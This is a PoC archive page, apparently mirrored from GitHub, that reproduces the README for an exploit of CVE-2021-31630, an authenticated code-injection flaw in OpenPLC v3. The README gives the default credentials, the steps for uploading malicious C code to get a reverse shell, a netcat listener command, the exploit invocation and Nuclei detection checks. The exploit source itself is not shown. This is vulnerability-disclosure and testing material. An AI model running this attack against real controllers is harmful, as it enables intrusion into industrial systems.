CVE-2021-31630 PoC — OpenPLC 代码注入漏洞

Source

https://github.com/machevalia/OpenPLC-CVE-2021-31630-RCE

Associated Vulnerability

Title:OpenPLC 代码注入漏洞 (CVE-2021-31630)
Description:OpenPLC是一种开源的可编程逻辑控制器。可为自动化和研究提供低成本的工业解决方案。 OpenPLC v3 存在代码注入漏洞，该漏洞源于产品的web服务中 /hardware 页面的Hardware Layer Code Box组件未能过滤输入的特殊字符。攻击者可通过该漏洞执行系统命令。

Readme

# OpenPLC v3 Authenticated RCE (CVE-2021-31630)

This is a modern Python 3.13+ compatible proof-of-concept exploit for CVE-2021-31630, a vulnerability in OpenPLC v3 that allows an authenticated user to upload a custom hardware layer containing malicious code, leading to remote code execution (RCE) on the host.

Original vulnerability discovery and advisory by Fellipe Oliveira.
This reimplementation and modernization uses httpx, CLI tooling, logging, and safer detection techniques.

## Exploit Overview
- Vulnerability: CVE-2021-31630
- Component: OpenPLC v3 Web Server
- Impact: Authenticated Remote Code Execution
- Default Credentials: openplc:openplc

## Exploit Flow
1. Login using valid credentials
2. Upload malicious C code as a custom hardware layer
3. Trigger compilation
4. Trigger execution (optional)
5. Receive reverse shell connection

## Usage
1. Start a listener:
```
nc -lvnp 9001
```
2. Run the exploit:
```
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001
```
Optional flags:
- -u Username (default: openplc)
- -p Password (default: openplc)
- -t Timeout in seconds (default: 20)

### Features
- [x] Compatible with Python 3.13+
- [x] Built with httpx 
- [x] Logging support for clean output
- [x] Modular functions for easier reuse
- [x] Nuclei detection templates included 

## Nuclei Detection Templates 
1. Default Credentials Check
```
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
```
2. Passive RCE Vulnerability Check
```
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
```
The second template logs in and attempts a harmless payload upload + compilation to confirm likely vulnerability — without triggering actual code execution.

## Included Files
- OpenPLC_CVE_2021_31630.py – Python 3.13+ exploit
- nuclei-templates/openplc-default-login.yaml – Detect default creds
- nuclei-templates/openplc-authenticated-rce-check.yaml – Detect vulnerable behavior safely
 
## ⚠️ Legal / Ethics

This code is for educational and authorized security testing only.
Do not use without explicit permission from the system owner.

File Snapshot


 [4.0K]  /data/pocs/677e5361e6f961d6155bec4d406f753650cfe65b
├── [4.0K]  nuclei-templates
│   ├── [1.2K]  openplc-authenticated-rce-check.yaml
│   └── [ 802]  openplc-default-login.yaml
├── [5.3K]  OpenPLC_CVE_2021_31630.py
└── [2.1K]  README.md

1 directory, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!